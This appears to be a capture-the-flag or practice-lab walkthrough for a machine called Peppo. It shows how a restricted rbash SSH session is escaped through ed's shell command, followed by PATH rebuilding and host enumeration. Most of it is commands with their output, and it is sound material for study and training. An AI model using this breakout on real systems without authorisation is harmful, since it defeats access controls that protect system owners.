rbash Escape
SSH session has been established to the target system as the eleanor user.
eleanor@peppo:~$ echo $SHELL
/bin/rbashHowever, the session is limited as current shell is rbash
Environment Variables
eleanor@peppo:~$ export -p
declare -x HOME="/home/eleanor"
declare -x LANG="en_US.UTF-8"
declare -x LOGNAME="eleanor"
declare -x MAIL="/var/mail/eleanor"
declare -x OLDPWD
declare -rx PATH="/home/eleanor/bin"
declare -x PWD="/home/eleanor"
declare -rx SHELL="/bin/rbash"
declare -x SHLVL="1"
declare -x SSH_CLIENT="192.168.45.218 49456 22"
declare -x SSH_CONNECTION="192.168.45.218 49456 192.168.154.60 22"
declare -x SSH_TTY="/dev/pts/0"
declare -x TERM="xterm-256color"
declare -x USER="eleanor"
declare -x XDG_RUNTIME_DIR="/run/user/1000"
declare -x XDG_SESSION_ID="15"Very limited
$PATH
eleanor@peppo:~$ echo $PATH
/home/eleanor/binThe $PATH variable points to the /home/eleanor/bin directory
Binaries
eleanor@peppo:~$ ls -la
total 28
drwxr-xr-x 4 eleanor eleanor 4096 Jul 9 2020 .
drwxr-xr-x 3 root root 4096 May 25 2020 ..
-rw-r--r-- 1 eleanor eleanor 30 Jun 1 2020 .bashrc
drwxr-xr-x 2 eleanor eleanor 4096 Jun 1 2020 bin
drwxr-xr-x 2 root root 4096 Jun 1 2020 helloworld
-rw-r--r-- 1 eleanor eleanor 33 Mar 29 15:54 local.txt
-rw-r--r-- 1 eleanor eleanor 30 Jun 1 2020 .profileChecking the home directory user reveals the bin directory
eleanor@peppo:~$ ls -la ./bin/
total 8
drwxr-xr-x 2 eleanor eleanor 4096 Jun 1 2020 .
drwxr-xr-x 4 eleanor eleanor 4096 Jul 9 2020 ..
lrwxrwxrwx 1 root root 10 Jun 1 2020 chmod -> /bin/chmod
lrwxrwxrwx 1 root root 10 Jun 1 2020 chown -> /bin/chown
lrwxrwxrwx 1 root root 7 Jun 1 2020 ed -> /bin/ed
lrwxrwxrwx 1 root root 7 Jun 1 2020 ls -> /bin/ls
lrwxrwxrwx 1 root root 7 Jun 1 2020 mv -> /bin/mv
lrwxrwxrwx 1 root root 9 Jun 1 2020 ping -> /bin/ping
lrwxrwxrwx 1 root root 10 Jun 1 2020 sleep -> /bin/sleep
lrwxrwxrwx 1 root root 14 Jun 1 2020 touch -> /usr/bin/touchThese are the binaries that the current session is allowed for use
ed
/Practice/Peppo/3-Exploitation/attachments/{25EA27E6-80FA-4819-B0A6-D2C32B1FB001}.png)
There is ed
/Practice/Peppo/3-Exploitation/attachments/{139254F4-5FBE-450D-855F-93583CB1D76A}.png)
According to GTFOBins, ed can be used to break out from restricted environments
Breakout
eleanor@peppo:~$ ed
!/bin/sh
$
$ echo $SHELL
/bin/rbashThe $SHELL variable is still set rbash
$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/tmp:$PATHBut I can build the environment around, starting from the $PATH variable
$ id
uid=1000(eleanor) gid=1000(eleanor) groups=1000(eleanor),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),999(docker)
$ env
MAIL=/var/mail/eleanor
USER=eleanor
SSH_CLIENT=192.168.45.218 49456 22
SHLVL=1
HOME=/home/eleanor
SSH_TTY=/dev/pts/0
LOGNAME=eleanor
_=/etc/ssh/sshd_config
XDG_SESSION_ID=15
TERM=xterm-256color
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/tmp:/home/eleanor/bin
XDG_RUNTIME_DIR=/run/user/1000
LANG=en_US.UTF-8
SHELL=/bin/rbash
PWD=/home/eleanor
SSH_CONNECTION=192.168.45.218 49456 192.168.154.60 22The $SHELL variable is still set rbash, but all the commands work now
$ whoami
eleanor
$ hostname
peppo
$ ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
3: docker0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default
link/ether 02:42:87:bb:a4:ca brd ff:ff:ff:ff:ff:ff
inet 172.17.0.1/16 brd 172.17.255.255 scope global docker0
valid_lft forever preferred_lft forever
5: veth6f82195@if4: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue master docker0 state UP group default
link/ether fe:0f:9a:09:8e:9b brd ff:ff:ff:ff:ff:ff link-netnsid 1
7: veth069982c@if6: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue master docker0 state UP group default
link/ether 5a:51:6a:02:fe:37 brd ff:ff:ff:ff:ff:ff link-netnsid 0
8: ens192: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
link/ether 00:50:56:9e:e8:b9 brd ff:ff:ff:ff:ff:ff
inet 192.168.154.60/24 brd 192.168.154.255 scope global ens192
valid_lft forever preferred_lft forever
Initial Foothold established to the target system as the eleanor user via SSH